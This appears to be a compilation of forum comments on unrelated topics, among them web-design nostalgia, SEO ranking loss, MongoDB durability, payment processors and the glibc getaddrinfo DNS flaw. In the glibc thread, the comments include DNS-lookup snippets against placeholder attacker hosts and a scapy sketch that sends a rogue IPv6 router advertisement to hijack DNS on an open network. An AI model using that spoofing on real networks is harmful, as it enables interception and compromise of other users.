
For a moment I thought this was about https://csszengarden.com/pages/about/

A long time ago it was an amazing source for learning CSS and getting design inspiration.


I still consider those years the golden years of web development, when the fruits of the web standards movement started to appear. Alas, then came React and all the good stuff was thrown out of the window. I guess tag soup is palatable when it's buried deep in node_modules.


Nowadays, I think the opposite. I feel a pang of jealousy and regret when I load a page from before CSS Zen Garden that uses tables for layouts. It still exists and works perfectly. I love how I can automatically date it in my mind, like period furniture or buildings. Unlike the thousands of pages that I made at the time, which are either gone or broken. I yearn for the html files that I lovingly handcrafted as unique pages. I destroyed them myself so that they could use a one-size-fits-all CSS solution. And they could in turn destroy each other with each new site redesign. If I ever get back on the indieweb, I'll be creating each page as a single file and allowing them to age gracefully.


I used to do web dev during the tables-as-layout days. I don't miss them one bit. For one, Netscape wouldn't render a table at all until it hit the closing tag, so a page with an unclosed table stayed blank. And that's to say nothing of the dodgy layout quirks browsers had. No thanks.


They work now though. Do you remember all the CSS hacks? All those pages are broken today.

I'm not saying it's better. I'm just saying I have a lot of regrets about jumping on the bandwagon too hard, with too little critical thinking and, if I'm honest, too much evangelism.


Golden years? I remember spending sleepless nights fighting browsers and their patchy CSS support.


I use https://goodsnooze.gumroad.com/l/macwhisper for this (no affiliation, just saw it on HN before). IIRC there are also some open source solutions in this space that work on Linux/Windows, but I haven't tried them.


Thank you, looks perfect for my use case. I will check it out later today.


Coincidentally, yesterday I finished reading "Four Thousand Weeks: Time Management For Mortals" (https://www.harvard.com/book/four_thousand_weeks/).

It's a great book if you feel overwhelmed by all the things you must/should/want to do and struggle to get the most out of your remaining weeks.


Thanks for the recommendation - I just got back from the local bookshop and managed to grab a paperback copy.


So can someone ELI5 how bad this is?

From what I'm reading, this should only affect systems that use a compromised DNS server or are subject to a MitM attack. Which is serious, but not so easily exploitable (I think).


It's worse than that. According to https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html, any system that performs a DNS lookup may be hit. And it's not hard to cause DNS lookups to happen (think reverse DNS lookups when logging login attempts, hovering a link in an email or webpage, etc.):

> A back of the envelope analysis shows that it should be possible to write correctly formed DNS responses with attacker controlled payloads that will penetrate a DNS cache hierarchy and therefore allow attackers to exploit machines behind such caches.

So even if you trust your local ISP and DNS servers, any random domain on the internet may be resolving to an exploit.

Also, this vulnerability has apparently been around since 2008, and it has been sitting in public view on the bug tracker for many months. Who knows who else has been sitting quietly on this for however long? :-/


If you request a network connection to an attacker-controlled host, your network software may try to resolve the attacker's hostname. The NS record for their domain can delegate resolution to the attacker's own name server, meaning your resolver ends up sending DNS queries directly to a server the attacker runs.

So in theory, all you need to be exploited is to connect to a compromised host and resolve its hostname.
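
To make that concrete: on Linux, CPython's socket.getaddrinfo() calls straight into glibc's getaddrinfo(), which is where the bug lives, so even an innocuous-looking resolution like this walks the vulnerable path. A minimal sketch; the hostname is a made-up placeholder and the call will simply fail to resolve for real:

  import socket

  # Resolving any attacker-controlled name is enough. AF_UNSPEC asks
  # for both A and AAAA records, the dual-query case the advisory
  # describes.
  socket.getaddrinfo("attacker-controlled.example", 80,
                     socket.AF_UNSPEC, socket.SOCK_STREAM)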


It could be even worse than that. If the attacker connects to you, your server may try to reverse-resolve their IP for logging, and the attacker controls the PTR record. Or the attacker could send you an email that's guaranteed to bounce, and they control the return path that your mailer has to resolve.
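
A quick sketch of those two incidental lookups; the IP is from the reserved documentation range and the domain is made up:

  import socket

  # PTR (reverse) lookup a server might do when logging a connection;
  # the attacker controls the PTR record for their own IP space.
  socket.getnameinfo(("192.0.2.1", 0), 0)

  # Forward lookup a mailer performs on a bounce's return path,
  # which the attacker also controls.
  socket.getaddrinfo("bounces.attacker.example", 25)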


> Which is serious but not so easily exploitable (I think).

Oh it is. All you need is an open wifi network whose router only hands out IPv4 addresses... start up radvd, advertise your machine as the network's IPv6 DNS server, and profit.
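
For the curious, this is roughly what radvd automates: a rogue router advertisement carrying an RDNSS option. A scapy sketch, assuming I remember scapy's IPv6 option fields correctly; 2001:db8::1 is a documentation-range stand-in for the attacker's machine:

  from scapy.all import IPv6, ICMPv6ND_RA, ICMPv6NDOptRDNSS, send

  # Advertise ourselves as the link's recursive DNS server to the
  # all-nodes multicast address; hosts that honor RDNSS will start
  # sending their DNS queries our way.
  ra = (IPv6(dst="ff02::1")
        / ICMPv6ND_RA()
        / ICMPv6NDOptRDNSS(lifetime=3600, dns=["2001:db8::1"]))
  send(ra)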


That requires local network access. So maybe easily exploitable, but not easy to use for mass infection.

Besides, how many distros are actually configured for stateful DHCPv6 out of the box?


Windows and OS X are, AFAIK, as well as the Debian installer... not sure about mainstream distros though.


Disclaimer: I have a layman's understanding (at best) of astrophysics.

Couldn't this be explained by an orbiting planet colliding with another body and breaking apart? Wouldn't that account for the number of "comets" the hypothesis requires?


I have a degree in physics... and this seems as reasonable an explanation as any other to date. We know planets migrate, and we know large collisions occur and tend to be followed by periods of bombardment (e.g. Theia/Earth -> Moon, Jupiter migrating from the inner to the outer system), so the observations, particularly coupled with the gradual but significant dimming, could correspond to Kessler syndrome on a stellar scale.

Actually, I say that, but they also address this in the paper: a planetary collision would result in a huge amount of excess heat (infrared), and there isn't any. So scratch that. Whatever did this is cold from our point of view.


I don't get it. Couldn't it have cooled down already and we're only seeing the junk?


Unlikely. The only place for thermal energy to escape is into deep space, in the form of infrared radiation. Given that the dimming has been large and recent, it would have to have been a recent collision - which would take millions of years to cool.


I see, very interesting. Thank you for the reply!


Could you please elaborate on how you created the mirror?

I have almost the same setup (Arch, Linode, nginx) and although my VPS has been rock solid so far, I would like to have something like this for testing purposes.


It's a nice presentation but are the videos available somewhere?


Hi Spyrosk, the videos will be available shortly. If you want to be notified, send me an email (you can find my contact info on my Twitter page, @simon).

Best,

Simone


Awesome. The #1 thing I hate about Slideshare is finding only the slides for presentations I wanted to see for myself.


Hi Stavro, how long has it been since you made the changes?

I've seen similar behavior a couple of times, where a site disappeared from Google's results for a couple of days after content and theme changes, but everything was back to normal after that. In any case, καλή τύχη (good luck).


Hey Spyro,

I made the change on the 16th, so it's been nearly two weeks now... Hopefully it will return, it was very nice to be able to say "I'm ranked just after python.org for 'learn python'" :/

Thanks for your help!


Hmm, that's quite a bit longer than what I've seen in the past, but not unheard of. What's odd is that your pages haven't disappeared completely from Google's index: e.g. if you enter "site:korokithakis.net" there are 302 results returned.

Perhaps Google has reevaluated your ranking for these keywords, as there are a lot of PR6-7 sites but yours is a PR4 (at least according to the SEO Site Tools extension).

Your best bet is to follow infinity's advice and start blogging more frequently, while targeting specific keywords for your posts.


Ah, that's too bad then. All the tutorials used to be on the top of the results, so wouldn't they at least slip a few places down? I don't think they'd get removed completely if that were the case...


Not necessarily. For example, your "Learn python in 10 minutes" post appears as a PR0 page, so it won't outrank your competitors. Keep in mind that this could be just a temporary glitch that might fix itself if/when your page is assigned a higher PR.

You mentioned that you've set up redirects from the old site to the new one. Are you sure your content doesn't appear twice under different URLs (ks.net/node/1 and ks.net/tutorials/First)? Google penalizes duplicate content.

Also, your /tutorials URL redirects back to the main domain. Is this by accident?
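
If it helps, here's a throwaway Python sketch to check what an old URL actually returns, without following the redirect (using the example path from above):

  import urllib.request, urllib.error

  # Don't follow redirects; we want to see the 3xx status itself.
  class NoFollow(urllib.request.HTTPRedirectHandler):
      def redirect_request(self, *args, **kwargs):
          return None

  opener = urllib.request.build_opener(NoFollow())
  try:
      resp = opener.open("http://korokithakis.net/node/1")
      print(resp.getcode())  # a 200 here means the page exists twice
  except urllib.error.HTTPError as e:
      # a 301 to the canonical URL is what you want to see
      print(e.code, e.headers.get("Location"))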


Oh wow, that'd be why they don't appear, then. It used to be PR 5 or 6, now it's 0? All the old URLs (/node/<something>) are now redirected to the canonical ones, which is as it should be...

/tutorials/ points to / because I removed the page that was there and linked to them in the sidebar. I have no idea why Google would take the site from 6 PR to 0, wow...


There is absolutely no correlation between having a high PageRank and outranking competitors. Go search for "hacker news" on Google and you'll see that www.thehackernews.com (a PR0 URL) outranks twitter.com/hackernews (a PR6).

The reason your site dipped out of the rankings is because when Google crawls a site and there have been significant changes to the structure (new theme, new internal linking structure, missing pages, etc), they yank you out of the index in order to reevaluate your proper position before moving forward. This can take a day, a week, a month, or half a year to recover; there is no way to predict how long it will take.

Try and replicate as much of your old site's structure as soon as possible, and just give it time.


I will do that, thank you. The old site structure was quite messy, with ugly URLs and links going back and forth between pages. I think this new scheme is much cleaner now, as it's just a few links to pages. I'll try to add some categories or tags, though, and see how it goes.

Thanks again!


What about data persistence? Is it still enforced only through replication?

I really liked MongoDB's philosophy, but this was the showstopper for me when I was exploring it. At least for some services I need to be certain that if the DB says it stored some data, that data was really written to disk and not kept in volatile memory until the DB decides it's the right time to flush it.

It's been a while since I looked at it though, and that may no longer be the case. Are there any improvements in this area?


1.8 has single server durability, but TBH I haven't had a chance to check it out in depth yet.
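
For reference, here's how you'd ask for that guarantee from a modern pymongo (so not what 1.8 actually shipped with, just the same idea): j=True tells the server to acknowledge a write only after it has reached the on-disk journal. A sketch with made-up names:

  from pymongo import MongoClient
  from pymongo.write_concern import WriteConcern

  client = MongoClient("mongodb://localhost:27017")
  # j=True: don't acknowledge until the write is in the journal,
  # not merely in memory.
  orders = client.shop.get_collection(
      "orders", write_concern=WriteConcern(w=1, j=True))
  orders.insert_one({"sku": "x-1", "qty": 2})  # hypothetical document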


http://saasy.com claim to have solved this problem, but I haven't used them yet. Does anyone have any experience with them?


Seems really expensive (5.9% plus $0.95, or 8.9% flat, per transaction).

I've been getting setup with Stripe. They just lowered their rates to 3.5% (from 5%) plus $0.30 per transaction. Good API and no other fees. Seems great so far...

https://eta.stripe.com/faq
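
Back-of-the-envelope, on a hypothetical $29 sale:

  # Fees using the rates quoted above.
  def fee(amount, pct, fixed=0.0):
      return amount * pct + fixed

  price = 29.00
  print(fee(price, 0.059, 0.95))  # Saasy, percent + fixed: ~$2.66
  print(fee(price, 0.089))        # Saasy, flat:            ~$2.58
  print(fee(price, 0.035, 0.30))  # Stripe:                 ~$1.32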


Everything was awesome up until this part of the FAQ:

> Stripe transfers money to your bank account at the end of the following month: that is, you receive June's payments at the end of July.


That page seems to redirect to an incredibly minimalist welcome page saying:

  Stripe

  Payment processing for developers
  
  Get in touch
I think I'd need a bit more information before I'd even investigate them!


Stripe looks promising, but based on their FAQ they are only available to US-based companies/persons for now, so they are not an option I can consider, at least in the near future.


FastSpring, the company behind them, is well regarded by many shareware developers I know.


That looks very interesting. Receiving payments is such a huge hurdle for small projects outside of the U.S. (for example, PayPal doesn't provide Website Payments Pro in Ireland, banks are pretty difficult for new businesses, etc.). Saasy looks like it might work.

